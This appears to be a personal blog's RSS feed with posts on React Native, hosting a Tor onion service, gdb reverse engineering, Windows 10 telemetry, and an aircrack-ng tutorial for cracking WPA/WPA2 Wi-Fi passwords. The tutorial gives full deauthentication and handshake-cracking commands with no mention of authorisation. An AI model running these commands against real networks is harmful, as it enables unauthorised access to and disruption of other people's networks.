<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>{ WLog }</title>
        <link>/</link>
        <description>My blog site</description>
        <lastBuildDate>Sun, 02 Aug 2020 14:15:07 GMT</lastBuildDate>
        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <item>
            <title><![CDATA[Transitioning from React to React Native]]></title>
            <link>/posts/2019-06-07/react-vs-react-native</link>
            <guid>/posts/2019-06-07/react-vs-react-native</guid>
            <content:encoded><![CDATA[<div><h1 id="how-do-you-go-from-react-to-react-native">How do you go from React to React Native?</h1><p>You already use React to build web apps.
You’ve heard about this thing called React Native and want to play with it… or even build a client project with it.</p><p>And you probably have many questions, one of which is:</p><blockquote><p>“Would I get lost if I don’t already know how to build apps with Swift/Java?”</p></blockquote><p>It depends on the app, but the quick answer is No, you won’t get lost. For the most part, things will work just like in React. You have some div-like components, which you can style with something like CSS. You have the same state and props mechanisms.</p><h2 id="when-might-you-need-to-know-some-swiftjava">When might you need to know some Swift/Java?</h2><p>If you plan on writing a full-featured mobile game, React Native will probably be out of consideration. If you need to write some native code, whether to optimize performance, or access native mobile APIs, knowing Swift, Objective-C, or Java will come in handy. Mostly, however, you are not going to need any knowledge of any native language.</p><p>But mobile apps often need to make use of some native APIs… do I have to learn Swift if I need Touch ID support? 
Even when you <em>do</em> have to make use of some native functionality, chances are, there’s a React Native wrapper for that already!</p><p>React Native comes bundled with some native wrappers:</p><ul><li><a href="https://facebook.github.io/react-native/docs/imagepickerios.html"><code>ImagePickerIOS</code></a></li><li><a href="https://facebook.github.io/react-native/docs/alert.html"><code>Alert</code></a></li></ul><p>And there are npm packages for things like <a href="https://github.com/naoufal/react-native-touch-id">Touch ID</a> and many more.</p><p>Which sometimes can require some fiddling around in Xcode or editing Gradle files (no worries if you have no idea what these are), but their readmes usually give clear step by step guidance on what to do.</p><p>In most cases, running <code>react-native link &lt;package-name&gt;</code> will do that for you, automatically!</p><p>What about distribution?</p><p>While the first-hand experience of Xcode, iTunes Connect and things in-between would be beneficial, you can follow the steps to submit your app even <em>without</em> knowing any Swift or Java.</p><p>While we’re at it…</p><h2 id="react-vs-react-native">React vs. React Native</h2><p>Here is a quick run-down of differences between React and React Native:</p><ul><li><p>Most of React knowledge is transferrable to React Native.</p><p>State, props, everything works the same way as you’d expect it to.</p></li><li><p><code>&lt;View&gt;</code> instead of <code>&lt;div&gt;</code>.</p><p>A <a href="https://facebook.github.io/react-native/docs/handling-text-input.html">different component for text input</a>.</p></li><li><p>Many of CSS properties are supported by React Native.</p><p>You have flexbox and absolute positioning and colors and borders and so on.</p><p>You don’t get CSS transitions, though. 
But React Native <em>does</em> come with a <a href="https://goshakkk.name/react-native-animated-building-blocks/">very powerful API for animations</a>.</p><p>Also — no media queries.</p></li><li><p>There are no class names, however. You have to pass in the styles directly to the components: <code>&lt;View style={{ margin: 10 }}&gt;</code>.</p></li><li><p><code>fetch</code> works as you’d expect it to.</p></li><li><p><a href="https://facebook.github.io/react-native/docs/asyncstorage.html"><code>AsyncStorage</code></a> in place of <code>localStorage</code>.</p></li><li><p>Android support can be quirky. <code>overflow: visible</code> is not supported, and until recently, there were <code>zIndex</code> issues.</p></li></ul></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[How to deploy a server on the dark web]]></title>
            <link>/posts/2019-06-14/host-server-dark-web</link>
            <guid>/posts/2019-06-14/host-server-dark-web</guid>
            <content:encoded><![CDATA[<div><p>The Tor browser can be downloaded from <a href="https://www.torproject.org/projects/torbrowser.html.en">here</a>.
Once installed, you can open the browser, and it will automatically connect to the Tor network.
You can view your route through the Tor network by clicking the drop-down arrow next to the onion icon in the upper left part of the window.</p><p>Tor protects people’s identities from being uncovered and allows them to express their ideas over the internet anonymously.
A significant <a href="https://metrics.torproject.org/">number of people</a> misuse this network to visit banned websites, download sexual content by bypassing filters and, most importantly, Tor is used by hackers to attack organizations without revealing their identity.
An example of the latter was the <a href="https://blog.rapid7.com/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit/">Skynet Botnet</a>, in which the Command and Control (C&amp;C) servers were hidden behind the Tor network.</p><h2 id="how-does-tor-work-">How Does Tor Work?</h2><p>Tor consists of a network of relay servers which are run by volunteers all over the world. When a user connects to the Tor network using a Tor client or Tor-enabled browser, a path is created from the user to the destination server to which the user needs to connect. This path consists of three relay servers called the Entry Node, Middle Node and Exit Node.
All the requests the sender sends to the destination through the Tor network are relayed through this pre-built path, and the responses from the destination return to the sender through the same path. All the data going through the Tor network is completely encrypted such that nobody who intercepts the communication has any clue who the sender is. Someone who sniffs the outgoing link from the exit node can capture the data transmitted in both directions, but anonymity is still secured.
When you download Tor from the website, you can run Tor as a local <a href="https://en.wikipedia.org/wiki/SOCKS">SOCKS</a> proxy on your computer. When your browser is configured to use that local SOCKS proxy, you can browse the internet with that browser through the Tor network. You can configure many applications to use this SOCKS proxy and use them through the Tor network; these applications include web browsers, download manager software, BitTorrent clients, etc.</p><p><strong>However, this blog post focuses on how to deploy a server using the onion routing protocol over Tor and is not an introduction to how Tor works.
You can find the exact specifics of how tor works <a href="https://2019.www.torproject.org/about/overview#thesolution">here</a>. Moving on.</strong></p><h2 id="section-1---running-a-simple-python-server">Section 1 - Running a simple python server</h2><p>The first step in configuring a Tor server will be setting up a way to serve HTTP content, just the same as a regular web server might. While we might choose to run a conventional web server at 0.0.0.0 so that it becomes accessible to the internet as a whole by its IP, we can bind our local server environment to 127.0.0.1 to ensure that it will be accessible only locally and through Tor.
On a system where we can call a Python module directly, we might choose to use the <strong>http.server</strong> module. After changing directories to one which contains content we would like to host, we can run a server directly from the command line.
Using Python 3 and <strong>http.server</strong>, we can use the following string to bind to 127.0.0.1 and launch a server on port 8080.
Just be sure that it’s bound to 127.0.0.1 to prevent discovery through services such as <a href="https://www.shodan.io/">Shodan</a>.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ python3 -m http.server --bind 127.0.0.1 8080
</code></pre><p>In order to make testing the server easier, it may be useful to create an “index.html” file in the directory from which the server is being run. Something as simple as the file below will work.</p><pre><code>&lt;html&gt;
&lt;body&gt;
W.L
&lt;/body&gt;
&lt;/html&gt;
</code></pre><p>To ensure that our server is functional, we’ll want to test our local address 127.0.0.1 or <code>localhost</code> in a web browser by opening it as an address followed by a port number, as seen below:</p><p><a href="http://localhost:8080">http://localhost:8080</a></p><p>With our local server environment configured and available at 127.0.0.1:8080, we can now start to link our server to the Tor network.</p><h2 id="section-2---configuring-the-tor-service">Section 2 - Configuring the tor service</h2><p>First, confirm that the Tor service is installed. The Tor service is separate from the Tor Browser and, for Linux, it is <a href="https://2019.www.torproject.org/docs/tor-doc-unix.html.en">available here</a>. On Ubuntu or Debian-based distros with the <strong>apt</strong> package manager, the following command should work assuming Tor is in the distro’s repositories.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo apt-get install tor
</code></pre><p>To confirm the location of our Tor installation and configuration, we can use <strong>whereis</strong>.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ whereis tor
</code></pre><p>This will show us a few of the directories which Tor uses for configuration. We’re looking for our “torrc” file, which is most likely in /etc/tor.
In order to direct Tor to our service, we’ll want to un-comment the following two lines in the <code>torrc</code> file.
To do this, we simply remove the “#” symbols at the beginning of those two lines.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:80
</code></pre><p>Next, we’ll want to correct the port on which Tor looks for our server. If we’re using port 8080, we’ll want to change the target in the line above from port 80 to port 8080, so that it reads as follows:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">HiddenServicePort 80 127.0.0.1:8080
</code></pre><p>Save and exit. If there are any permission problems, just run it with <code>sudo</code>.</p><h2 id="section-3---testing">Section 3 - Testing</h2><p>Once we confirm that the necessary changes have been made to the <code>torrc</code> file and Python’s HTTP server is running at localhost:8080, we can simply run the following command to start the Tor service.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo tor
</code></pre><p>Upon starting Tor for the first time with our new configuration, an .onion address will be generated automatically. This information will be stored in <code>/var/lib/tor/hidden_service</code>.
We then cd to that directory:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ cd /var/lib/tor/hidden_service
</code></pre><p>After running <code>ls</code> to ensure that both the <code>hostname</code> and <code>private_key</code> files are in the directory, we can view our newly generated address.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ cat hostname
</code></pre><p>The string ending in .onion is our service address.
While this one was automatically generated, we can customize it if necessary.
We can test that our service is accessible by opening it in Tor Browser.
If the address resolves to your server, you’ve successfully hosted a tor server!</p><h2 id="section-4---extra-optional">Section 4 - Extra (Optional)</h2><p>In order to customize our onion address, we’ll need to generate a new private key to match a custom hostname. Due to the nature of Tor addresses being partially hashes, in order to create a custom address, we’ll need to brute-force the address we want.
The more consecutive characters of a word or phrase we’d like to use, the longer it will take to generate.</p><p>There are a few open source tools available for this, <a href="https://github.com/ReclaimYourPrivacy/eschalot">Eschalot</a> and <a href="https://github.com/lachesis/scallion">Scallion</a> being some of the more popular ones.
<code>Scallion</code> uses the GPU to generate addresses, while <code>Eschalot</code> works using wordlists. That’s about it.
You can deploy any type of HTTP server using this; there’s no requirement to stick with Python’s HTTP server.
You could run the same HTTP server using Node.js, which is actually what I would personally prefer.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ npm i -g http-server
$ http-server
</code></pre></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Reverse engineering binaries using gdb]]></title>
            <link>/posts/2019-06-21/gdb-reverse-engineering</link>
            <guid>/posts/2019-06-21/gdb-reverse-engineering</guid>
            <content:encoded><![CDATA[<div><h2 id="general-note-on-compiling-for-debugging">General note on compiling for debugging:</h2><p>Normally, to enable the debugger to use the source code, you would compile a program using the <code>-g</code> flag:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ gcc -g program.c -o program (for lowest level of optimization), or

$ gcc -g -O2 program.c -o program (for optimization level 2)
</code></pre><p>The <code>-g -O2</code> combination is valid and enables one to debug the optimized executable. However, the compiler will have generated a lot of optimizations, which will make it more difficult to step through the code. Using -g with no optimizations works best for debugging with source code.</p><h2 id="examining-the-executable-file">Examining the executable file</h2><p>The symbol table is sometimes useful to identify calls to standard library functions (e.g., <code>printf</code>), as well as the bomb’s own functions. Note that the symbol table is always present in the executable, even if the executable was compiled without the -g switch. </p><p>You can look at the bomb’s whole symbol table by using <code>nm</code>:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ nm bomb
</code></pre><p>Examine the symbols marked with a T (capital t), and ignore the ones that start with an _ (underscore). These are names of functions from the C program that was used to compile the bomb. </p><p>Next, take a look at the printable strings from the file:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ strings program 
</code></pre><p>This can often provide clues that will help you understand the program. Then, use <code>objdump</code> to disassemble the bomb:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ objdump -d program | less
</code></pre><h2 id="gdb-gnu-debugger">GDB (GNU DeBugger) </h2><p>gdb is a debugger commonly used when programming, but it is also useful for reverse engineering binary code. It lets you step through the assembly code as it runs, and examine the contents of registers and memory. You can also set breakpoints at arbitrary positions in the program. Breakpoints are points in the code where program execution is instructed to stop. This way, you can let the debugger run without interruption over large portions of code, such as code that we already understand or believe is error-free.</p><h2 id="starting-gdb">Starting gdb</h2><p>Start gdb by specifying what executable to debug:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ gdb program 
</code></pre><p>You can run the program in the debugger just as you would outside the debugger, except that you can instruct the program to stop at certain locations and inspect current values of memory and registers. As a last resort, you can use (Ctrl-C) to stop the program and panic out. But this is not recommended and is usually not necessary, as long as you positioned your breakpoints appropriately.</p><p>To start a program inside gdb:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) run

To start a program inside gdb, with certain input parameters:
$ (gdb) run parameters

Examples:
$ (gdb) run &lt; ./solution.txt
(equivalent to ./program &lt; solution.txt, but inside gdb)

$ (gdb) run -d 1
(equivalent to ./program -d 1)

To exit gdb and return to the shell prompt:
$ (gdb) quit
</code></pre><p>Note that exiting gdb means you lose all of the breakpoints that you set in this gdb session. When you re-run gdb, you need to respecify any breakpoints that you want to re-use.</p><h2 id="breakpoints">Breakpoints</h2><p>We wouldn’t be using gdb if all we did was run the program without any interruptions. We need to stop program execution at certain key positions in the code, and then examine program behavior around those positions. How do we pick a good location for a breakpoint?</p><p>First, you can always set a breakpoint at <code>main</code>, since every C program has a function called <code>main</code>.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) break main
</code></pre><p>You can also set breakpoints at the other functions you identified with <code>nm</code>.</p><p>To set a breakpoint at the machine instruction located at the address 0x401A23:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">(gdb) break *0x401A23
</code></pre><p>Note: don’t forget the <code>0x</code>. If you forget it, and if you are unlucky enough that the address doesn’t contain any A, B, C, D, E, F characters, the breakpoint address will be interpreted as if given in decimal notation. This results in a completely different address from the one desired, and the breakpoint won’t work as expected.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">To see what breakpoints are currently set:
$ (gdb) info break

To delete one or more breakpoints:
$ (gdb) delete &lt;breakpoint number&gt;

Example:
$ (gdb) delete 4 7
erases breakpoints 4 and 7. 
</code></pre><h2 id="terminating-program-execution-from-within-gdb">Terminating program execution from within gdb</h2><p>We can terminate the program at any time:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) kill
</code></pre><p>Note that this doesn’t exit gdb, and all your breakpoints remain active. You can re-run the program using the run command, and all breakpoints still apply.</p><h2 id="stepping-through-the-code">Stepping through the code</h2><p>To execute a single machine instruction, use</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) stepi
</code></pre><p>Note that if you use <code>stepi</code> on a callq instruction, the debugger will proceed inside the called function.
Also note that pressing Enter re-executes the last gdb command. To execute several <code>stepi</code> instructions one after another, type <code>stepi</code> once, and then press Enter several times in a row. </p><p>Sometimes we want to execute a single machine instruction, but if that instruction is a call to a function, we want the debugger to execute the function without our intervention. This is achieved using <code>nexti</code>:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) nexti
</code></pre><p>Program will be stopped as soon as control returns from the function, i.e. at the instruction immediately after callq in the caller function. </p><p>If you accidentally use stepi to enter a function call, and you really don’t want to debug that function, you can use “finish” to resume execution until the current function returns. Execution will stop at the machine instruction immediately after the “callq” instruction in the caller function, just as if we had called “nexti” in the first place:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) finish
</code></pre><p>Note: make sure the current function can really be run safely without your intervention. You don’t want it to call explode_bomb. </p><p>To instruct the program to execute (without your intervention) until the next breakpoint is hit, use:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) continue
</code></pre><p>The same warning as in the case of “finish” applies. </p><p>If the program contains debugging information (i.e., it was compiled with the -g switch to gcc), you can also step a single C statement:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) step
</code></pre><p>Or, if the next statement is a function call, you can use “next” to execute the function without your intervention. This is just like nexti, except that it operates on C code as opposed to machine instructions:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) next
</code></pre><h2 id="disassembling-code-using-gdb">Disassembling code using gdb</h2><p>You can use <code>disassemble</code> to disassemble a function or a specified address range. </p><p>To disassemble function some_function:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) disassemble some_function
</code></pre><p>To disassemble the address range from 0x4005dc to 0x4005eb:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) disassemble 0x4005dc,0x4005eb
</code></pre><h2 id="examining-registers">Examining registers</h2><p>To inspect the current values of registers:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">(gdb) info registers
</code></pre><p>This prints out the current values of all registers.</p><p>To inspect the current values of a specific register (assuming 32-bit registers):</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) p $eax

To print the value in hex notation:
$ (gdb) p/x $eax
</code></pre><p><strong>Note</strong>: if you are debugging a 64-bit program, replace the EXX registers with RXX (e.g. use $rax instead of $eax). Using “p $eax” to print just the lower 32 bits of the register doesn’t work (at least with some versions of gdb). You have to print a full 64-bit register.</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">To see the address of the next machine instruction to be executed:
$ (gdb) frame
or, equivalently, you can inspect the instruction pointer register:
$ (gdb) p/x $eip

You can also inspect the value of a variable:
$ (gdb) p buffer

or its address:
$ (gdb) p &amp;buffer
</code></pre><p>When debugging a C/C++ program for which the source code is available, you can also inspect the call-stack (a list of all nested function calls that led to the current function being executed):</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) where
</code></pre><h2 id="examining-memory">Examining memory</h2><p>To inspect the value of memory at location 0x400746:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) x/NFU 0x400746
</code></pre><p>Here:</p><ul><li>N = number of units to display</li><li>F = output format (hex=x, signed decimal=d, unsigned decimal=u, string=s, char=c)</li><li>U = defines what constitutes a unit: b=1 byte, h=2 bytes, w=4 bytes, g=8 bytes</li></ul><p>Note that the output format and unit definition characters are distinct from each other.</p><p>Examples:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">To use hex notation, and print two consecutive 64-bit words, starting from the address 0x400746 and higher:
$ (gdb) x/2xg 0x400746

To print a null-terminated string at location 0x400746:
$ (gdb) x/s 0x400746

To use hex notation, and print five consecutive 32-bit words, starting from the address 0x400746:
$ (gdb) x/5xw 0x400746

To print a single 32-bit word, in decimal notation, at the address 0x400746:
$ (gdb) x/1dw 0x400746
</code></pre><h2 id="examining-core-files">Examining core files</h2><p>If your program segfaults, it is sometimes useful to examine the core dump (for example, memory addresses may be different when running a program in gdb and when executing it separately). To do this, you first have to configure your operating system to dump core:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ ulimit -c unlimited
</code></pre><p>When a program receives a segmentation fault (SEGFAULT) signal, you will find a corefile (typically called core or core.PID, where PID is the ID of the process that crashed) in the current directory. Load it in gdb as follows:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ (gdb) core corefile
</code></pre><p>You can then use all the gdb commands described above to examine the state of the stack, variables, memory, etc. when the process crashed.</p><h2 id="gdb-references">GDB references</h2><ul><li><a href="https://www.cs.umd.edu/class/spring2015/cmsc414/downloads/gdb-refcard.pdf">Quick reference card</a></li><li><a href="http://www.gnu.org/software/gdb/documentation/">The full manual</a></li></ul></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Hacking wireless access points]]></title>
            <link>/posts/2019-06-27/aircrack-ng</link>
            <guid>/posts/2019-06-27/aircrack-ng</guid>
            <content:encoded><![CDATA[<div><p>If you want to know how to hack WiFi access points — just read this step by step <code>aircrack-ng</code> tutorial, run the verified commands and crack passwords easily.</p><p>With the help of these commands you will be able to hack WiFi AP (access points) that use WPA/WPA2-PSK (pre-shared key) encryption.</p><p>The basis of this method of hacking WiFi lies in capturing the WPA/WPA2 authentication handshake and then cracking the PSK using <code>aircrack-ng</code>.</p><h1 id="section-1-aircrack-ng-download-and-install">Section 1, Aircrack-ng: Download and Install</h1><hr/><h3 id="how-to-hack-wireless-access-points----the-action-plan">How to hack Wireless Access Points — the action plan:</h3><ol><li>Download and install the latest <code>aircrack-ng</code></li><li>Start the wireless interface in monitor mode using the <code>airmon-ng</code></li><li>Start the <code>airodump-ng</code> on AP channel with filter for BSSID to collect authentication handshake</li><li>[Optional] Use the <code>aireplay-ng</code> to deauthenticate the wireless client</li><li>Run the <code>aircrack-ng</code> to hack the WiFi password by cracking the authentication handshake</li></ol><h3 id="install-the-required-dependencies">Install the required dependencies:</h3><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
</code></pre><h3 id="download-and-install-the-latest-aircrack-ng-current-version">Download and install the latest <code>aircrack-ng</code> (<a href="http://www.aircrack-ng.org/doku.php?id=install_aircrack#current_version">current version</a>):</h3><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz  -O - | tar -xz
$ cd aircrack-ng-1.2-rc4
$ sudo make
$ sudo make install
</code></pre><h3 id="ensure-that-you-have-installed-the-latest-version-of-aircrack-ng">Ensure that you have installed the latest version of <code>aircrack-ng</code>:</h3><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ aircrack-ng --help

  Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d&#39;Otreppe
  http://www.aircrack-ng.org
</code></pre><h1 id="section-2-airmon-ng-monitor-mode">Section 2, Airmon-ng: Monitor Mode</h1><hr/><p>Now it is required to start the wireless interface in monitor mode.
Monitor mode allows a computer with a wireless network interface to monitor all traffic received from the wireless network.
What is especially important for us — monitor mode allows packets to be captured without having to associate with an access point.
Find and stop all the processes that use the wireless interface and may cause troubles:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo airmon-ng check kill
</code></pre><h3 id="start-the-wireless-interface-in-monitor-mode">Start the wireless interface in monitor mode:</h3><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo airmon-ng start wlan0
Interface   Chipset     Driver

wlan0       Intel 6235  iwlwifi - [phy0]
                (monitor mode enabled on mon0)
</code></pre><p>In the example above, <code>airmon-ng</code> has created a new wireless interface called <code>mon0</code> and enabled monitor mode on it.
So the correct interface name to use in the next parts of this tutorial is the <code>mon0</code>.</p><h1 id="section-3-airodump-ng-authentication-handshake">Section 3, Airodump-ng: Authentication Handshake</h1><hr/><p>Now, when our wireless adapter is in monitor mode, we have a capability to see all the wireless traffic that passes by in the air.
This can be done with the <code>airodump-ng</code> command:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo airodump-ng mon0
</code></pre><p>All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1
</code></pre><p>Start <code>airodump-ng</code> on the AP’s channel with a BSSID filter to collect the authentication handshake for the access point we are interested in:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
</code></pre><table><thead><tr><th>Option</th><th>Description</th></tr></thead><tbody><tr><td><code>-c</code></td><td>The channel for the wireless network</td></tr><tr><td><code>--bssid</code></td><td>The MAC address of the access point</td></tr><tr><td><code>-w</code></td><td>The file name prefix for the file which will contain the authentication handshake</td></tr><tr><td><code>mon0</code></td><td>The wireless interface</td></tr><tr><td><code>--ignore-negative-one</code></td><td>Fixes the “fixed channel : -1” error message</td></tr></tbody></table><p>Now wait until <code>airodump-ng</code> captures a handshake.
If you want to speed up this process, go to step #4 in section 1 and try to force wireless client reauthentication.
After some time you should see <code>WPA handshake: 00:11:22:33:44:55</code> in the top right-hand corner of the screen.
This means that <code>airodump-ng</code> has successfully captured the handshake:</p><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
</code></pre><h1 id="section-4-aireplay-ng-deauthenticate-client">Section 4, Aireplay-ng: Deauthenticate Client</h1><hr/><p>If you can’t wait till <code>airodump-ng</code> captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP.
The wireless client will then hopefully reauthenticate with the AP and we’ll capture the authentication handshake.</p><h3 id="send-deauth-to-broadcast">Send deauth to broadcast:</h3><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
</code></pre><h3 id="send-directed-deauth-attack-is-more-effective-when-it-is-targeted">Send directed deauth (attack is more effective when it is targeted):</h3><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
</code></pre><table><thead><tr><th>Option</th><th>Description</th></tr></thead><tbody><tr><td><code>--deauth 100</code></td><td>The number of de-authenticate frames you want to send (0 for unlimited)</td></tr><tr><td><code>-a</code></td><td>The MAC address of the access point</td></tr><tr><td><code>-c</code></td><td>The MAC address of the client</td></tr><tr><td><code>mon0</code></td><td>The wireless interface</td></tr><tr><td><code>--ignore-negative-one</code></td><td>Fixes the “fixed channel : -1” error message</td></tr></tbody></table><h1 id="section-5-aircrack-ng-hack-wifi-password">Section 5, Aircrack-ng: Hack WiFi Password</h1><hr/><p>Unfortunately there is no way except brute force to break WPA/WPA2-PSK encryption.
To hack a WiFi password, you need a password dictionary.
And remember that this type of attack is only as good as your password dictionary.
You can download some dictionaries from <a href="https://wiki.skullsecurity.org/Passwords">here</a>.</p><h3 id="crack-the-wpawpa2-psk-with-the-following-command">Crack the WPA/WPA2-PSK with the following command:</h3><pre><code class="language-console" data-language="console" data-highlighted-line-numbers="">$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
</code></pre><table><thead><tr><th>Option</th><th>Description</th></tr></thead><tbody><tr><td><code>-w</code></td><td>The name of the dictionary file</td></tr><tr><td><code>-b</code></td><td>The MAC address of the access point</td></tr><tr><td><code>WPAcrack.cap</code></td><td>The name of the file that contains the authentication handshake</td></tr></tbody></table><pre><code>                     Aircrack-ng 1.2 beta3 r2393

               [00:08:11] 548872 keys tested (1425.24 k/s)

                       KEY FOUND! [ 987654321 ]

  Master Key    : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97
                   CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5

  Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8
                   AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6
                   DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9
                   A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3

  EAPOL HMAC    : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62
</code></pre></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[What data is collected from your Windows 10 machine and where it's going]]></title>
            <link>/posts/2019-06-29/windows-10-telemetry</link>
            <guid>/posts/2019-06-29/windows-10-telemetry</guid>
            <content:encoded><![CDATA[<div><p>Windows 10 includes a piece of software called the Connected User Experience and Telemetry component, also known as the Universal Telemetry Client (UTC). It runs as a Windows service with the display name DiagTrack and the actual service name utcsvc. Microsoft has engineered this component as a part of Windows. You can see the <code>DiagTrack</code> service in the Services console in Windows 10. It’s not a secret.</p><p>To find the process ID (PID) for the service, look on the Services tab in Windows Task Manager. This piece of information is useful for anyone who wants to monitor activities of the DiagTrack service using other software tools. I used that PID to watch the activity of the DiagTrack service.</p><h2 id="what-data-is-collected-from-a-windows-10-machine">What data is collected from a Windows 10 machine?</h2><p>Telemetry data includes information about the device and how it’s configured (including hardware attributes such as CPU, installed memory, and storage), as well as quality-related information such as uptime and sleep details and the number of crashes or hangs. Additional basic information includes a list of installed apps and drivers. For systems where the telemetry is set to a level higher than Basic, the information collected includes events that analyze interaction between the user and the operating system and apps.</p><h2 id="where-is-the-telemetry-data-stored">Where is the telemetry data stored?</h2><p>On a Windows 10 machine, telemetry data is stored in encrypted files in the hidden <strong>%ProgramData%\Microsoft\Diagnosis</strong> folder. The files and folders in this location are not accessible to normal users and have permissions that make it difficult to snoop in them. Even if you could look into the contents of those files, there’s nothing to see, because the data files are encrypted locally.</p><h2 id="where-is-all-the-data-going">Where is all the data going?</h2><p>Moment of truth. 
You can find the DNS hostnames below. Unfortunately hostnames like these aren’t super helpful. Different people can look up the hostnames to different IP addresses, depending on their location. Routers need IP ranges to block, not hostnames.</p><p>If you want to minimize telemetry, you can disable the <code>DiagTrack</code> service and put the above hostnames in your hosts file. That should block outgoing traffic. You can use Wireshark or any other packet monitoring tool such as <a href="https://github.com/abhishekwl/Network-monitor">this</a> to check it out yourself.</p></div>]]></content:encoded>
        </item>
    </channel>
</rss>